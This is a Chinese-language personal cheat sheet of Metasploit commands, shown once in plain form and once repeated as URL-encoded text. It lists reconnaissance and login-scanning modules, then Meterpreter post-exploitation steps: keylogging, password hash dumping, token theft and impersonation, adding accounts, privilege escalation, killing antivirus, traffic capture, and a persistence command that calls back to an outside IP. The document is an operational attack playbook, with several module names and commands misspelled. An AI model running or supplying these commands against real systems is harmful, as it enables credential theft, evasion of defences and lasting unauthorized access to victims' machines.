Edit

Metasploit

程序猿笔记 metasploit

1. 主动信息收集

  • tcp idle scan: use auxiliary/scanner/ip/ipidseq 扫描规律性增长ipid 配合nmap使用nmap -PN -sI

  • smb_version scan 用于发现操作系统信息
    scanner/smb/smb_version

  • mssql 扫描
    use scanner/mssql/mssql_ping
  • ssh 扫描
    use scanner/ssh/ssh_version
  • ftp scanner/ftp/anonymous
  • snmp scanner/snmp/snmp_login

2. 漏洞扫描

  • smb_login: use auxiliary/scanner/smb/smb_login
  • vnc 扫描 use auxiliary/scannery/vnc/vnc_none_auth

3. Meterperter

  • 截屏 screenshot
  • 系统信息 sysinfo
  • 键盘记录:
    1. mirgate 到 explorer.exe进程
    2. run post/windows/capture/keylog_recorder
    3. dump hash:
      use priv
      run post/windows/gather/hashdump

    4. token 窃取

    1. use incognito
    2. list_tokens -u
    3. impersonate_token
    4. 添加用户: add_user -h
    5. 添加用户到组 add_group_user -h

  • 权限提升: use priv getsystem

  • vnc: run vnc
  • migrate: run post/windows/manage/migrate
  • kill av: run killav
  • view traffic: run packetrecorder -i 1
  • 搜集系统信息: run scraper
  • 持续化攻击:run persistence -X -i 50 -p 443 -r 192.168.33.129
  • win api 操作:
    irb
    client.railgun.user32.MessgeBoxA()

配合Veil框架

%23Metasploit%20%0A@%28%u7A0B%u5E8F%u733F%u7B14%u8BB0%29%5Bmetasploit%5D%0A%0A%23%23%201.%20%u4E3B%u52A8%u4FE1%u606F%u6536%u96C6%0A+%20tcp%20idle%20scan%3A%20%60use%20auxiliary/scanner/ip/ipidseq%60%20%u626B%u63CF%u89C4%u5F8B%u6027%u589E%u957Fipid%20%u914D%u5408nmap%u4F7F%u7528%60nmap%20-PN%20-sI%20%3Cidel%20host%3E%20%3Ctarget%20host%3E%60%0A%0A+%20smb_version%20scan%20%u7528%u4E8E%u53D1%u73B0%u64CD%u4F5C%u7CFB%u7EDF%u4FE1%u606F%0A%09%09scanner/smb/smb_version%0A+%20mssql%20%u626B%u63CF%0A%09%20%09use%20scanner/mssql/mssql_ping%0A+%20ssh%20%u626B%u63CF%0A%09%09use%20scanner/ssh/ssh_version%0A+%20ftp%20%60scanner/ftp/anonymous%60%0A+%20snmp%20%60scanner/snmp/snmp_login%60%0A%0A%23%23%202.%20%u6F0F%u6D1E%u626B%u63CF%0A+%20smb_login%3A%20%60use%20auxiliary/scanner/smb/smb_login%60%0A+%20vnc%20%u626B%u63CF%20%60use%20auxiliary/scannery/vnc/vnc_none_auth%60%0A%0A%23%23%203.%20Meterperter%0A+%20%u622A%u5C4F%20%60screenshot%60%0A+%20%u7CFB%u7EDF%u4FE1%u606F%20%60sysinfo%60%0A+%20%u952E%u76D8%u8BB0%u5F55%3A%0A%09%3E%201.%20mirgate%20%u5230%20explorer.exe%u8FDB%u7A0B%0A%09%3E%202.%20%60run%20post/windows/capture/keylog_recorder%60%0A+%20dump%20hash%3A%0A%09%09use%20priv%0A%09%09run%20post/windows/gather/hashdump%0A+%20token%20%u7A83%u53D6%0A%0A%09%3E%201.%20%60use%20incognito%60%0A%09%3E%202.%20%60list_tokens%20-u%20%60%0A%09%3E%203.%20%60impersonate_token%20%3Ctokenname%3E%60%0A%09%3E%204.%20%u6DFB%u52A0%u7528%u6237%uFF1A%20%60add_user%20%3Cusername%3E%20%3Cpassword%3E%20-h%20%3Chost%3E%60%0A%09%3E%205.%20%u6DFB%u52A0%u7528%u6237%u5230%u7EC4%20%60add_group_user%20%3Cgroup%3E%20%3Cuser%3E%20-h%20%3Chost%3E%60%0A%0A+%20%u6743%u9650%u63D0%u5347%uFF1A%20%60use%20priv%60%20%60getsystem%60%0A+%20vnc%3A%20%60run%20vnc%20%60%0A+%20migrate%3A%20%60run%20post/windows/manage/migrate%60%0A+%20kill%20av%3A%20%60run%20killav%60%0A+%20view%20traffic%3A%20%60run%20packetrecorder%20-i%201%60%0A+%20%u641C%u96C6%u7CFB%u7EDF%u4FE1%u606F%uFF1A%20%60run%20scraper%60%0A+%20%u6301%u7EED%u5316%u653B%u51FB%uFF1A%60run%20persistence%20-X%20-i%2050%20-p%20443%20-r%20192.168.33.129%60%0A+%20win%20api%20%u64CD%u4F5C%uFF1A%0A%09%09irb%0A%09%09client.railgun.user32.MessgeBoxA%28%29%0A%0A%23%23%20%u914D%u5408Veil%u6846%u67B6